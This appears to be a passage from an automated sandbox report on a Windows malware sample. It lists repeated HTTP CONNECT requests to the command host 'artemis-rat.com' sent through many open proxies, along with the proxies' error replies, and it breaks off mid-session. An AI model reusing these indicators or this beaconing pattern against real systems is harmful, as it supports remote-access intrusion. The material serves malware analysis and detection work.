                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1472192.168.2.452683162.215.219.157416977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.074794054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.163489103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.257201910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.257297039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.256819010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1473192.168.2.454683172.67.182.107807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.074920893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.232847929 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1474192.168.2.45484043.153.16.2304437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.075047016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1475192.168.2.45459738.162.10.7531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.075654984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.491815090 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1476192.168.2.454625192.169.205.131356707284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.078567028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.756988049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1477192.168.2.45412268.71.249.153486067284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.078615904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1478192.168.2.454671159.89.138.130807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.078617096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.251252890 CET343INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.10.3 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 182
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1479192.168.2.45461045.196.144.15254327284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.079593897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.296412945 CET308INHTTP/1.1 407 Proxy Authentication Required
                                              Server: FaaS v1.3-20220203-7fa38bd5af
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 65
                                              Proxy-Authenticate: Basic realm="Proxy"
                                              Connection: close
                                              Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                              Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1480192.168.2.45485447.236.85.1134437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.081068039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1481192.168.2.454429111.3.102.135300017284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.081598997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1482192.168.2.454483116.199.168.141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.083050966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1483192.168.2.45485749.51.94.124437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.084132910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1484192.168.2.45485831.7.65.184437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.106832981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1485192.168.2.45485981.143.236.2004437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.106959105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1486192.168.2.45486243.153.16.2304437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.173724890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1487192.168.2.452405188.235.0.20781817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.173985004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.925980091 CET994INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:38:49 GMT
                                              Server: Apache/2.4.55 (Win64) OpenSSL/1.1.1s
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Max-Age: 1000
                                              Access-Control-Allow-Headers: X-Requested-With, Content-Type, Origin, Authorization, Accept, Client-Security-Token, Accept-Encoding
                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, DELETE, PUT
                                              Content-Length: 530
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 61 64 6d 69 6e 40 65 78 61 6d 70 6c 65 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at admin@example.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1488192.168.2.45451547.56.110.20489897284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.179861069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.484003067 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.16.1
                                              Date: Mon, 11 Mar 2024 07:22:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1489192.168.2.454710104.25.87.42807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.179912090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.334264994 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1490192.168.2.454692104.19.235.10807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.179936886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.334660053 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1491192.168.2.454715104.16.106.65807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.180058956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.334530115 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1492192.168.2.454713172.67.35.15807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.180094004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.334724903 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1493192.168.2.454720104.20.75.69807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.183496952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.342972040 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1494192.168.2.453916191.102.254.2880857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.183609962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
